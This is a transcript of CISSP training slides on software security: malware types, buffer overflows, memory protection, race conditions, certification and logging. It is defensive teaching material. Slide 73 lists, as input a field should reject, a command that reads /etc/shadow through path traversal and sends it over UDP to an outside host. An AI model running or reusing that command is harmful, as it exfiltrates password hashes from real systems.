CISSP Week 14
CISSP Week 14 Presentation Transcript

  • 1. Security Issues In Source Control StaridLabs CISSP Training CBK Pages 699-752 Jem Jensen September 07, 2013
  • 2. Jem Is Back!
  • 3. Buffer Overflow ● Program writes data past the end of a memory buffer ● Simplest Example: char array[1]; int i = 0; while (1) { array[i++] = 0; }
  • 4. Buffer Overflow ● More modern example: ● Fill a parameter with more data than the application expects and can handle ● Excess data gets written past the end of the buffer and into system memory ● NOP (“no-op”) Sled: ● Insert many “perform no operation” instructions before the payload to make the exploit more fault-tolerant
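The sled idea above can be sketched in Python with a byte string (illustrative only; the payload here is a placeholder, not real shellcode):

```python
# Layout sketch of a NOP sled: an attacker only needs to guess a return
# address that lands SOMEWHERE in the sled; execution then "slides"
# through the no-ops until it reaches the payload.
NOP = b"\x90"                      # the x86 no-operation opcode
payload = b"PAYLOAD-PLACEHOLDER"   # stands in for attacker shellcode

SLED_SIZE = 64
exploit = NOP * SLED_SIZE + payload
# Any landing point in the first 64 bytes eventually reaches the payload.
```

The larger the sled, the more tolerant the exploit is to an inaccurate address guess.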
  • 5. Citizen/Casual Programmers ● Users who know how to program enough to make their own scripts and programs ● Outside of security controls and monitors ● Probably not trained on the org coding standards and up-to-date security patterns
  • 6. Covert Channel ● Two cooperating processes can transfer information in a way that violates the system's security policies ● Could be intended (an insider is trying to get info out) or unintended (accidental data leaking) ● Storage: 2+ subjects at different security levels share a memory location or disk sector ● Timing: A process can vary its rate of utilization to signal or affect a second process
  • 7. Malformed Input Attacks ● Mask malicious input to trick controls ● Example: Application accepts URLs but firewall blocks malicious ones. So we encode the URL in unicode instead of ASCII so the firewall rule doesn't trigger ● SQL Injection ● XSS ● Buffer Overflows
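The SQL injection case above can be shown with a minimal Python `sqlite3` sketch (table and data are made up for illustration): string concatenation lets input rewrite the query, while a bound parameter is treated purely as data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

malicious = "x' OR '1'='1"

# Vulnerable: the input's quotes escape the literal and change the WHERE clause.
unsafe = conn.execute(
    "SELECT * FROM users WHERE name = '%s'" % malicious).fetchall()

# Safe: the ? placeholder binds the value as data; no user named x' OR... exists.
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (malicious,)).fetchall()
```

The vulnerable query matches every row; the parameterized one matches none.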
  • 8. Memory Reuse ● Example: Application asks for a chunk of memory. The OS gives the raw chunk, which still contains whatever data was previously in it from the last application ● Ideally, an OS should zero-out memory before reissuing it
  • 9. Executable Content/Mobile Code/Active Capsule/... ● Code transmitted across a network for local execution ● Example: Email attachments, applets (Java, ActiveX, Flash) ● Could simply access data it shouldn't or could be full-blown malware
  • 10. Social Engineering ● Getting people to divulge sensitive information through lying or misrepresentation ● Friendly, Aggressive, Intimidation, Bullying ● Scareware – tricks users into thinking they need to run a program to get “safe” again ● Phishing – pretending to be a legitimate site
  • 11. Time of Check/Use ● Race conditions – output is dependent on the sequence/order/timing of events ● Example: ● A user logs into a system ● The user is fired and deactivated from login ● The user is still logged in and can retaliate for being fired!
  • 12. Between-the-lines Attack ● Injecting data into others' communications ● Example: Telephone “party lines”
  • 13. Trapdoor/Backdoor ● Hidden mechanism to bypass access control ● Sometimes added for “maintenance” ● Dangerous! Anyone could use it!
  • 14. Malware ● Software intentionally designed to penetrate systems, break security policies, and carry damaging payloads ● Synonymous with “virus” to most people ● Designed to use systems for further assaults ● Very easy to make – use existing malware as a template and package around a new CVE
  • 15. Not Malware ● Excludes bugs – must be intentional ● Excludes toolkits/utilities – malware can initiate and continue attacks without a user directly controlling it
  • 16. Virus ● Copies and disperses itself without knowledge or cooperation of owner/user ● Worm: Special category of virus that requires no user interaction ● May or may not contain a payload
  • 17. Types of Viruses ● File Infectors: Infects/spreads through files ● Boot sector Infectors: Replace boot sector ● System Infectors: Infects OS files so virus runs on boot. Ex: registry, COMMAND.COM ● Companion Virus: Place .COM file in a directory with a .EXE – Windows runs .COM first if it finds one ● Email Virus: Targets specific mail servers, harvests e-mail addresses, and propagates with more e-mails ● Multipartite: Infects more than one type of object ● Macro Virus: Infects templates to run as macros when documents are opened (MS Word, Excel) ● Script Virus: Stand-alone scripts (.VBS, .SH)
  • 18. Worms ● Spread on their own, usually by exploiting vulnerabilities in common software ● LoveLetter – infected e-mail attachments and attached network drives
  • 19. Hoaxes ● Warnings about viruses that do not exist ● E-mail chain letters ● May instruct users to make changes that harm or destroy their systems ● Example: delete this system file if you find it!
  • 20. Trojans ● Pretend to do one thing while performing another unwanted action ● Remote Access Trojans (RAT) ● Used to remotely access/control computer ● Back Orifice, Netbus, Bionet ● Not viral – trojans lack self-propagation
  • 21. DDoS Zombies ● Distributed Denial of Service ● A quick history: old single-source DoS vs newer distributed DDoS ● Virus infects computers with a payload that waits for instructions from a botnet ● When the time is right, all of the infected zombies perform a coordinated attack
  • 22. Logic Bombs ● Triggered only after certain conditions are met ● Example: Starts after a certain date or after a certain employee is fired ● Salami Scam: Siphon off small amounts of money on each transaction
  • 23. Spyware/Adware ● Spyware: Collect information on a user or system ● Adware: Provide advertising to a user, against the user's wishes ● Often “bundled” secretly or stealthily with legitimate software, turning them into trojans
  • 24. Pranks ● Insult the user, make sound effects, make the computer non-functional in some way ● Generally not considered malware if it makes an announcement about its presence
  • 25. Botnets ● A network of automated systems performing a specific, malicious function ● Can be installed via other malware or by choice (LOIC) ● Clients connect to a command & control (C&C) system to retrieve instructions ● C&C could be IRC, P2P, IM, etc
  • 26. Malware Protection ● Training & Guidelines ● Don't open attachments ● Disable ActiveX, VBScript, etc ● Use multiple scanners & scan everything
  • 27. Scanners ● Look for signatures of malware ● May or may not repair infections – often just detect and quarantine
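Signature scanning reduces to pattern matching over bytes. A toy Python sketch (the signatures here are made-up placeholders, not real malware patterns):

```python
# Minimal signature scanner: report every known byte pattern found in a blob.
# Real scanners use far more efficient multi-pattern matching and huge
# signature databases; this just shows the core idea.
SIGNATURES = {
    "fake-dropper": b"\xde\xad\xbe\xef",
    "fake-keylogger": b"HOOK_KBD_V1",
}

def scan(data: bytes) -> list:
    """Return the names of all signatures present in the data."""
    return [name for name, sig in SIGNATURES.items() if sig in data]
```

This also shows the weakness the next slide addresses: any variant whose bytes differ from the stored signature is missed, which is why heuristic scanners exist.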
  • 28. Heuristic Scanners ● Looks for suspicious code or telltale behaviors
  • 29. Activity Monitors ● Watches for: ● changes to key files ● system resource changes ● attempts to access/alter other programs ● May ask for confirmation of changes
  • 30. Change Detection ● Compares previous versions of files to the latest version ● May use CRC to just detect that a change occurred ● May actually track the changes
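The CRC approach above can be sketched in a few lines of Python (file names and contents are invented for the example). Note CRC32 detects accidental change but is not tamper-proof; an attacker can forge a matching CRC, which is why integrity monitors use cryptographic hashes.

```python
import zlib

def checksum(data: bytes) -> int:
    # CRC32 is cheap and fine for "did this change?", not for security.
    return zlib.crc32(data)

# Baseline recorded when the system was known-good.
baseline = {"config.ini": checksum(b"debug=false\n")}

def detect_change(name: str, current: bytes) -> bool:
    """True if the file's CRC no longer matches the stored baseline."""
    return checksum(current) != baseline[name]
```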
  • 31. Antimalware Practices ● Educate regularly ● Review effectiveness ● Monitor activity or telltale signs of infection and malware activity
  • 32. StaridLabs CISSP Training CBK Pages 729-752 Tim Jensen September 07, 2013
  • 33. Software Protection Mechanisms
  • 34. Security Kernels ● The Kernel is the lowest and most important level of an Operating System. ● Basic Purposes (Reference Monitor): ● Completeness: All information flows through the Kernel ● Isolation: Kernel is protected from unauthorized access ● Verifiability: The kernel must be a proven design
  • 35. Remember the last time you saw a Kernel Attacked?
  • 36. Example of Kernel Attacks (#OffTopicTim) ● Kees Cook discovered a format string vulnerability in the Linux kernel's disk block layer. A local user with administrator privileges could exploit this flaw to gain kernel privileges. ● Hannes Frederic Sowa discovered that the Linux kernel's IPv6 stack does not correctly handle Router Advertisement messages in some cases. A remote attacker could exploit this flaw to cause a denial of service. ● Windows: ...Vulnerabilities could allow elevation of privilege if an attacker logged on locally and ran a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit these vulnerabilities.
  • 37. Those were just a few of the several dozen disclosed in the last 30 days. Not all are disclosed by OS vendors.
  • 38. Marketing Buzzwords you need to know (because they're on the test) Reference Monitor: A reference monitor concept defines a set of design requirements on a reference validation mechanism, which enforces an access control policy over subjects’ (e.g., processes and users) ability to perform operations (e.g., read and write) on objects (e.g., files and sockets) on a system. – The reference validation mechanism must always be invoked (complete mediation). – The reference validation mechanism must be tamperproof (tamperproof). – The reference validation mechanism must be small enough to be subject to analysis and tests, the completeness of which can be assured (verifiable) Definition from: http://ix.cs.uoregon.edu/~butler/teaching/10F/cis607/papers/jaeger-refmon.pdf
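The three requirements above can be made concrete with a tiny Python sketch of complete mediation (the policy table, subjects, and objects are invented for illustration): every access path goes through one small, analyzable check.

```python
# Toy reference monitor: ONE function mediates every access attempt.
# The policy is a set of allowed (subject, operation, object) triples.
POLICY = {
    ("alice", "read", "report.txt"),
    ("alice", "write", "report.txt"),
    ("bob", "read", "report.txt"),
}

def check_access(subject: str, op: str, obj: str) -> bool:
    """The reference validation mechanism: small enough to audit fully."""
    return (subject, op, obj) in POLICY

def read_file(subject: str, obj: str) -> str:
    # Complete mediation: no code path reads an object without this check.
    if not check_access(subject, "read", obj):
        raise PermissionError(f"{subject} may not read {obj}")
    return f"contents of {obj}"   # placeholder for the real read
```

Tamperproofing and verifiability are what the sketch can't show: in a real kernel the monitor must also be isolated from the subjects it judges and small enough to prove correct.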
  • 39. Buzzword Bingo ● Security Kernel - the central part of a computer or communications system hardware, firmware, and software that implements the basic security procedures for controlling access to system resources. Definition from: http://en.wikipedia.org/wiki/Security_kernel
  • 40. Marketers <3 Buzzwords ● TCB (Not the Drug): Stands for trusted computing base. TCB contains all elements of a system responsible for supporting security policy and isolating objects. Can be verified using Trusted Computer System Evaluation Criteria (TCSEC) and Common Criteria (CC).
  • 41. Processor Privilege States ● Privilege states protect the processor and the activities that it performs ● Generally hardware controlled ● Intended to protect memory access from less privileged to more privileged levels (If implemented correctly) ● Many Operating Systems have two processor access modes: User and Kernel mode
  • 42. Kernel Mode ● Allows access to all system memory, resources, and all CPU instructions. ● Applications should run in user mode to protect resources
  • 43. Windows PPS
  • 44. Linux PPS
  • 45. Android PPS
  • 46. Ring Model
  • 47. (Not in CBK): What Rings are actually designed for
  • 48. Security Controls for Buffer Overflows
  • 49. NOP Sled
  • 50. Buffer Overflow ● Improper checking causes memory buffers to overflow and potentially overwrite data for other applications ● Example: Wireless standards state that an SSID can be a max of 32 characters. If an attacker sends an SSID of 34 characters and the victim tries storing it, a buffer overflow could occur if memory was only allocated for 32 characters.
  • 51. Controls for Incomplete parameter checking and enforcement ● Parameter checking: Check for disallowed characters, length, data types, format ● Canary: Memory is reserved between memory spaces and monitored. If any changes occur to the memory space then a buffer overflow occurred and the offending application is either notified, terminated, or blacklisted from execution
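Parameter checking for the SSID example two slides back can be sketched in Python (buffer size and function name are invented for illustration): validate the length before copying, instead of trusting the sender.

```python
MAX_SSID_LEN = 32  # the 802.11 maximum from the earlier slide

def store_ssid(ssid: bytes, buf_size: int = MAX_SSID_LEN) -> bytes:
    """Reject oversized input BEFORE it touches the buffer."""
    if len(ssid) > buf_size:
        raise ValueError(f"SSID too long: {len(ssid)} > {buf_size}")
    return ssid  # placeholder for copying into the fixed-size buffer
```

A 34-byte SSID is rejected up front rather than overrunning a 32-byte allocation; Python itself bounds-checks, so the sketch only illustrates the checking discipline that C code must do by hand.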
  • 52. Canary
  • 53. Memory Protection ● Memory partitioning – Memory must be segregated by process and protected from unauthorized access
  • 54. Memory Protection Methods ● 1. Ensure all system-wide data structures and memory pools used by kernel mode system components can be accessed only while in kernel mode. (See Epic Fails in Windows 95/98 security) ● 2. Each process has a separate, private address space protected from being accessed by any request belonging to another process, with few exceptions.
  • 55. Memory Protection Methods Cont'd ● 3. Most modern processors provide some form of hardware controlled memory protection such as read or write access. Example: PAGE_NOACCESS ● 4. Access Control Lists should protect shared memory objects and they are checked when processes attempt to open them (vs attempt to overwrite them)
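Hardware-controlled access rights can be observed from Python via a read-only memory mapping (a sketch; the file and its contents are invented): the mapping behaves like a read-only page, and writes are refused.

```python
import mmap
import os
import tempfile

# Map a file read-only: reads succeed, writes are rejected, analogous to
# a page mapped without write permission (cf. PAGE_NOACCESS on Windows).
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"secret data\n")
    path = f.name

with open(path, "rb") as f:
    ro = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)

data = ro[:6]                      # reading the mapping is allowed
try:
    ro[0:1] = b"X"                 # writing to a read-only map is refused
    write_refused = False
except TypeError:
    write_refused = True

ro.close()
os.unlink(path)
```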
  • 56. Covert Channels ● A covert channel is when two processes are able to transfer information in a way that violates the system's security policy ● Only channels which breach the security policy are of interest ● A covert channel MUST have access to a shared resource ● Example: A user process has a memory space shared with a kernel mode process in the kernel process space. The user process could overwrite kernel memory locations and cause intentional or unintentional system damage or data exposure
  • 57. Cryptography – Not just for networking anymore! ● Cryptography can be applied to the whole OS, to database files, etc. ● (It's becoming more common to encrypt pieces of data in memory as well: Such as using a hash or reversible encryption on a password when holding it in a variable instead of leaving it plaintext)
  • 58. Password Protection Techniques (Does this really have to be in a CISSP book?) ● Passwords are commonly used to provide authentication and establish access controls to resources. ● Password files are prone to unauthorized access. ● Passwords are commonly hashed to protect them, but hashed passwords are prone to dictionary attacks. ● Password fields can be masked so passwords can't be read by shoulder-surfers
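The standard mitigation for the dictionary-attack point above is a salted, iterated hash. A minimal Python sketch using the standard library (function names and the iteration count are illustrative choices):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Salted, iterated hash: the random salt defeats precomputed
    dictionaries, and the iteration count slows brute-force guessing."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    # Constant-time comparison avoids leaking where the digests differ.
    return hmac.compare_digest(candidate, digest)
```

Only the salt and digest are stored; the plaintext never needs to be.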
  • 59. Inadequate Granularity of Controls ● See Access Control Domain ● Separation of Duties ● Dev/QA/Prod should be split apart
  • 60. Time of Check/Time of Use (TOC/TOU) ● Most common TOC/TOU is a file-based race condition – occurs when a check on some property of the file precedes the use of that file. ● Example: In a multi-process application you could have two processes reading/writing to a file. If the file is opened/closed continuously then the file location (inode location) could change. Instead the inode should be looked up and held open during writes from a process so the location doesn't change or a file not found error could occur. Once closed the second process can get a handle on the file for writes and close safely when fully complete.
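The safe pattern described above, open once and do every later check and use through that one handle, can be sketched in Python (the file name and directory are invented for the example):

```python
import os
import tempfile

# TOCTOU-safe pattern: check properties of the OPEN descriptor (fstat),
# not of the path (stat), so nothing can swap the path to a different
# inode between the check and the use.
tmpdir = tempfile.mkdtemp()
path = os.path.join(tmpdir, "audit.log")

fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
try:
    before = os.fstat(fd)              # time-of-check, via the handle
    os.write(fd, b"audit entry\n")     # time-of-use, via the SAME handle
    after = os.fstat(fd)
    same_inode = before.st_ino == after.st_ino
finally:
    os.close(fd)

os.unlink(path)
os.rmdir(tmpdir)
```

Because both `fstat` calls and the write go through one descriptor, the inode cannot change between check and use, which is exactly the race the path-based check/open sequence allows.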
  • 61. Social Engineering ● Subtle intimidation, bluster, pulling rank, exploiting guilt, pleading, exploiting helpfulness, appealing to an underling's subversive streak ● Activities include: Password stealing, dumpster diving, spreading malicious misinformation ● Protections: Make users aware of threats, proper procedures for handling unusual AND normal requests for information
  • 62. Backup Controls ● Operating systems and applications should be backed up in the event of system failure. ● Contingency plans should be in place for prioritized restoration in the event of large scale system outages.
  • 63. Software Forensics ● Analyzing software suspected of being malicious ● Could be source code analysis or compiled code analysis ● Trying to identify: Is it malware, who wrote it, where was it written, what would it affect, what's the malware's intent?
  • 64. Mobile Code Controls ● Attaching programs (javascript, java, flash, activex, vbscript, macros, etc) to transient data (websites, office documents, email, etc) ● (Tim Note: Anything that uses XML or HTML could be susceptible to mobile code attacks. See Transmission Bittorrent Client CVE from last year)
  • 65. Sandbox ● Mobile code can be sandboxed (most of the time) ● Limits are placed on the amount of memory and processor resources the program can consume. If resources go over the allotted amount then the process is terminated and an error logged. ● In Java: Java applications live outside the sandbox and java applets live inside the sandbox
  • 66. Programming Languages ● To increase security a type-safe programming language should be used like Java (The book said it...Page 746...) ● Ensures arrays stay in bounds, pointers are always valid, code cannot be placed in strings and then executed.
  • 67. Configuration Management ● Log changes to source code ● Log changes to configuration settings ● Review changes ● Create Change Plans ● “Any deviation from change plans could change the configuration of the entire system and could essentially void any certification that it is a secure, trusted system.”
  • 68. Information Protection Management ● If software is shared, it should be protected from unauthorized modification.
  • 69. This is getting a bit dry... ● Did you know that at DEFCON there actually is a pool on the roof?
  • 70. Effectiveness of Software Security
  • 71. Certification and Accreditation ● In the United States, federal agencies are mandated to conduct security certification of systems that process, store or transmit information on behalf of the government. Certification is the technical evaluation or assessment of security compliance of the information system within the operational environment. ● Must meet user functional requirements, as well as security requirements.
  • 72. Certification Cont'd ● NIST SP 800-37 is a recommended security authorization process and its procedures. ● The US Government and its business associates are required: ● To have a certification and accreditation process which ensures a control framework has been selected and is consistently being applied ● If part of the change management program then the system authorization process is relatively low overhead ● Security authorization standards mandate the use of standards (standard protocols, operating systems, etc) ● Should include: physical security, training, environment, and interconnections
  • 73. Auditing and Logging ● Information Integrity: Data reconciliation – Totals or check sequence numbers should be compared to make sure the right operation was performed against the right data. ● Information Accuracy: Data validation and verification should be incorporated into applications. If a field should be 1-9 numbers only, the field shouldn't accept any of these: (alienbabbies, 42, drop tables;, cat ../../../../../../../../etc/shadow > /dev/udp/staridlabs.org/1337)
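The field-validation point can be sketched with a Python whitelist check (reading the slide's "1-9 numbers only" as one to nine digits; that interpretation and the function name are mine):

```python
import re

# Whitelist validation: accept exactly what the field should contain
# (here, 1 to 9 digits) and reject everything else, so the slide's
# injection strings never reach the application logic.
FIELD_RE = re.compile(r"[0-9]{1,9}")

def valid_field(value: str) -> bool:
    return FIELD_RE.fullmatch(value) is not None
```

Whitelisting (define what is allowed) is preferred over blacklisting (enumerate what is forbidden), since attackers only need one encoding the blacklist missed.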
  • 74. Logging Cont'd ● Information Auditing – Scouring logs to find abnormal activities. Disabling or modifying logging should cause a log event/notification.
  • 75. Risk Analysis and Mitigation ● Most vulnerabilities are developed into software at its inception or as part of changing the software's configuration over time.
  • 76. Risk Mitigation ● Process should be built into SDLC ● Use standardized methods of assessing risk ● Qualitative vs quantitative vs hybrid ● ISO, NIST, ANSI, ISACA frameworks ● Should be comprehensive in risk and focus, not just on technology but on operational and managerial controls ● Track and manage weaknesses discovered during assessment
  • 77. Corrective Actions ● Vulnerability findings must be reviewed and prioritized. ● ***Not all findings need to be mitigated*** ● Stats that reduce screaming in meetings: ● The finding and details of how it was discovered ● How was risk determined and what is the threat, likelihood, and impact ● Remediation cost and what the impact of remediation will be ● Cost of not fixing it (reputation, compliance, fines, being sued, etc)
  • 78. Testing and Verification ● Mitigations need to be tested after they are implemented (Make sure to have reproducible steps before mitigating so you can be sure it's fixed!!!) ● Development teams should not be doing the validation. Once they say it's fixed the vulnerability should be re-assessed by security or an independent party. (Not a slight against developers – just separation of duties.)